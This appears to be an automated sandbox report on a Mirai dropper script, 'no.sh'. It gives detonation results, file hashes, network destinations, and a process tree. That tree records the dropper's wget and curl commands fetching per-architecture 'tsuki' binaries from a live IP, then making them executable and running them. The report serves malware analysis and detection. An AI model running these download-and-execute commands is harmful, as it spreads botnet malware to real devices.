Analysis Overview
SHA256
95af6dd9da15577bfd171daebb2f404a52df04d38a4bcad538ef4b79a6435cae
Threat Level: Known bad
The file no.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-22 00:14
Signatures
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-22 00:14
Reported
2024-07-22 00:16
Platform
debian9-mipsel-20240418-en
Max time kernel
69s
Max time network
71s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/no.sh | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
Processes
/tmp/no.sh
[/tmp/no.sh]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x no.sh systemd-private-0ed40a9e127f41699077075a5bd2978f-systemd-timedated.service-DCyFuE tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x no.sh tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
Files
/tmp/tsuki.x86
| MD5 | f60ada8b79c2232773b9c08868c1c5fb |
| SHA1 | 8752a84f5cc638e0a87ffa7bb28d4a9661fcbefa |
| SHA256 | 2d1fd93daf8cadaf775a8cd4e21f8b7b1759442bd260eb6dde3aee319adae117 |
| SHA512 | 71fe4806ac06da9a8d704bbabcc7dc7d0d7e087b420ea81923c888f0f8836b455e790899504729611e883e597a31c5eb7298c4cd5f442117cc799f98102eb9e8 |
/tmp/tsuki
| MD5 | 6cf78b3572c325d809ad4677c2ebd6a2 |
| SHA1 | be2f27c2b001f981344e52333568cb0dc7ffe7ad |
| SHA256 | c6603610d98124953b9b6e4355611cb0588507a8a003aff36771937b43e2acd0 |
| SHA512 | bcb15e53b55134cefcf8de2c0fd28fee6154dc63bc053007f581cec3bc024052b663eed5ce2f3eea3c3b7749d2f4e7a5b0ed013c489bc1c28755d82bebea8a24 |
/tmp/tsuki
| MD5 | 2cf4b7e9a6fa11dbff627fc7aeee3f97 |
| SHA1 | 0cbc6d981a4d7ce2650ebe9aba5ec89a8377fefb |
| SHA256 | eb2c0d50d32ebf8d18e82dd780c2432f4010e5dd8f0cc84c04a10f03f8399a6d |
| SHA512 | 18272662786616a679ed85164c4fa7fe2a865f8c4eedde57403f8fd197c34b356ff3a62155ea9069f2e1f172c4545c29db4c3144c9932f90bdea5a4f14141f57 |
/tmp/tsuki
| MD5 | 3cd8418ac8f414def6727fe141d328b9 |
| SHA1 | dc61b74e9e08ff3208ee96a6c94f8247e6196b99 |
| SHA256 | cbe3077abc42c9e725ee561b8e369c9e5b3819d762d8fa9889b27c1e10dfb8b3 |
| SHA512 | 98d72d05b5b65fac98ed3b448ebf73786040da5aebbe56c060781f78638e75e62ad8801618874c4c17c13cd59bab93f58a31b565a350ac118257d2a0a21409b9 |
/tmp/tsuki
| MD5 | eeed291445ee3e6bac53540dfd6cd91c |
| SHA1 | afc1907c25cf19a1ecf3e83fcd1f7cc72d085f41 |
| SHA256 | 43953e23b49d467cd6b2e40603c2465769cd1620706ef52fecc71777f9964f78 |
| SHA512 | ee610ac06ef742dbf5b616c72b30a32b64a2873272cbf297367de20563bf405b183842fb5e2012f29d5ee11e6ee10e97a90ec915ffb659f22439f7c1ca21d283 |
/tmp/tsuki
| MD5 | adf30c84e4d1a741bb51593fa750d624 |
| SHA1 | ca52225d16c403e9e6ab662e8dab63496281945d |
| SHA256 | 96de1caeeddeba6420add3efbba3e360a13b9956a32be4ee1d4464129154e806 |
| SHA512 | 9ce9154a018aa53c49403c1919cb223f066821a22a9692cbb1defd185098842d8ded4f0a3f17cd6017367ea1357c41295c9f199d1148998f7283f511244db846 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-22 00:14
Reported
2024-07-22 00:16
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
17s
Max time network
131s
Command Line
Signatures
Mirai
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
| N/A | /tmp/tsuki | /tmp/tsuki | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki | /tmp/no.sh | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/tsuki.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tsuki.arc | /usr/bin/curl | N/A |
Processes
/tmp/no.sh
[/tmp/no.sh]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.x86]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.x86]
/bin/cat
[cat tsuki.x86]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mips]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mips]
/bin/cat
[cat tsuki.mips]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.mips tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.mpsl]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.mpsl]
/bin/cat
[cat tsuki.mpsl]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm]
/bin/cat
[cat tsuki.arm]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm5]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm5]
/bin/cat
[cat tsuki.arm5]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm6]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm6]
/bin/cat
[cat tsuki.arm6]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arm7]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arm7]
/bin/cat
[cat tsuki.arm7]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.ppc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.ppc]
/bin/cat
[cat tsuki.ppc]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.m68k]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.m68k]
/bin/cat
[cat tsuki.m68k]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.spc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.spc]
/bin/cat
[cat tsuki.spc]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.i686]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.i686]
/bin/cat
[cat tsuki.i686]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.sh4]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.sh4]
/bin/cat
[cat tsuki.sh4]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
/usr/bin/wget
[wget http://176.123.2.219/bins/tsuki.arc]
/usr/bin/curl
[curl -O http://176.123.2.219/bins/tsuki.arc]
/bin/cat
[cat tsuki.arc]
/bin/chmod
[chmod +x config-err-KaZKo5 netplan_shzgbutu no.sh snap-private-tmp ssh-DJAIfF5vDuSn systemd-private-405cfb5ad6264ab195f9c96db16d9d87-bolt.service-TbhmLP systemd-private-405cfb5ad6264ab195f9c96db16d9d87-colord.service-Zm2MHU systemd-private-405cfb5ad6264ab195f9c96db16d9d87-ModemManager.service-byjNAE systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-resolved.service-9DiRy3 systemd-private-405cfb5ad6264ab195f9c96db16d9d87-systemd-timedated.service-zrymRL tsuki tsuki.arc tsuki.arm tsuki.arm5 tsuki.arm6 tsuki.arm7 tsuki.i686 tsuki.m68k tsuki.mips tsuki.mpsl tsuki.ppc tsuki.sh4 tsuki.spc tsuki.x86]
/tmp/tsuki
[./tsuki payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| US | 151.101.193.91:443 | tcp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| GB | 89.187.167.8:443 | tcp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
| MD | 176.123.2.219:80 | 176.123.2.219 | tcp |
